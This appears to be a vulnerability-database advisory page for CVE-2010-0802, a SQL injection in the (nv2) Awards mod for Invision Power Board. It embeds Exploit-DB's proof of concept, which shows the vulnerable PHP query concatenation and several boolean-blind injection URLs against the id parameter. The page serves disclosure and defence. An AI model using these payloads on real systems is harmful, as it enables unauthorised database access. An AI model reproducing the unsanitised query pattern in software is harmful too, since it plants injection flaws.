CVE-2010-0802

high

Published 2010-03-02 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

SQL injection vulnerability in index.php in (nv2) Awards 1.1.0, a modification for Invision Power Board, allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-11297 webapps php text · 2 KB

fred777 · 2010-01-30

IPB (nv2) Awards < 1.1.0 - SQL Injection

text exploit Source: Exploit-DB

#################################################
+
+  Author:      fred777 - [fred777.de]
+  Link:          http://forums.invisionize.com/nv2-Awards-120-t137847.html
+  Vuln:         index.php?autocom=awards&do=view&id=1
+  Greetzz to: Back2hack.cc
+  Contact:    nebelfrost77@googlemail.com
+
#################################################

--[ Vuln Code ] --

$this->ipsclass->DB->build_query( array( 'select' => 'a.user_id',
		                                           'from' => array( 'awarded' => 'a' ),
					  'where' => 'a.award_id=' . $this->ipsclass->input['id'],
					  'add_join' => array( 0 => array( 'select' => 'm.members_display_name',
					  'from' => array( 'members' => 'm' ),
						'where' => 'm.id=a.user_id',
						  'type' => 'left',
																				 ) ),
					  ) );

--------------------------------------------------------------------------------------

		'select' => '*',
		'from' => 'awards',
		'where' => 'id = "' . $_POST['award'] . '"',
		) );

--------------------------------------------------------------------------------------

	    $award_dat['user_id'] = $_GET['id'];
		$award_dat['award_id'] = $_POST['award'];

################################################

--[ Exploitable ]--

http://server/index.php?autocom=awards&do=view&id=1[SQL INJECTION]

http://server/index.php?autocom=awards&do=view&id=1+and+1=1 > true
http://server/index.php?autocom=awards&do=view&id=1+and+1=0 > false

http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=5
http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=4

################################################

Application impact

Vendor	Product	Versions
invision_power_services	invision_power_board	`2.3.1`
invision_power_services	invision_power_board	`2.3.4`
aleinbeen	\(nv2\)_awards	`1.1.0`
invision_power_services	invision_power_board	`2.2`
invision_power_services	invision_power_board	`2.2.1`
invision_power_services	invision_power_board	`2.2.2`
invision_power_services	invision_power_board	`2.3`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.